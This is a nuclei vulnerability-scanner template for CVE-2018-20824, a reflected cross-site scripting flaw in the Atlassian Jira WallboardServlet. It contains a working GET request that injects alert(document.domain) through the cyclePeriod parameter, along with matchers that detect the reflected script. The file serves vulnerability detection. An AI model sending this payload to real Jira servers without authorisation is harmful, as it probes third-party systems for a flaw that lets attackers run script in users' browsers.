nuclei-templates/cves/2018/CVE-2018-20824.yaml

30 lines
949 B
YAML

id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot,dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
reference:
- https://jira.atlassian.com/browse/JRASERVER-69238
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-20824
cwe-id: CWE-79
tags: cve,cve2018,atlassian,jira,xss
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- (?mi)timeout:\salert\(document\.domain\)
part: body